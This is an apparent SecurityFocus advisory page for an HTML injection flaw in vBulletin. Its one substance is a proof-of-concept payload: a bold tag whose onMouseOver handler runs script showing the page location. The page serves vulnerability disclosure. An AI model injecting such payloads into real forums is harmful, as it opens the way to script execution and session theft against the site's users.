info
discussion
exploit
solution
references
vBulletin HTML Injection Vulnerability
The following proof of concept was provided:
<b onMouseOver="alert(document.location);">Test!</b>
Privacy Statement
Copyright 2010, SecurityFocus